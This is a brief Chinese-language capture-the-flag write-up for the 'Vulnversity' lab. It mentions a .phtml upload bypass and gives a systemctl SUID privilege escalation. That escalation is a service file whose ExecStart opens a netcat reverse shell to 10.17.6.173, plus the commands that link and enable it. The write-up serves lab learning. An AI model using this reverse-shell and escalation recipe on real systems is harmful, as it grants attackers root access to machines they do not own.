Vulnversity

前面是常规的文件上传

phtml绕过后缀检测

后面是个suid提权

systemctl

echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.6.173 9998 >/tmp/f"
[Install]
WantedBy=multi-user.target' > $TB


不好写,用cat

TF=$(mktemp).service

cat > 1.txt << EOF
[Service]
Type=oneshot
ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.6.173 9998 >/tmp/f"
[Install]
WantedBy=multi-user.target
EOF

cat 1.txt > $TF
systemctl link $TF
systemctl enable --now $TF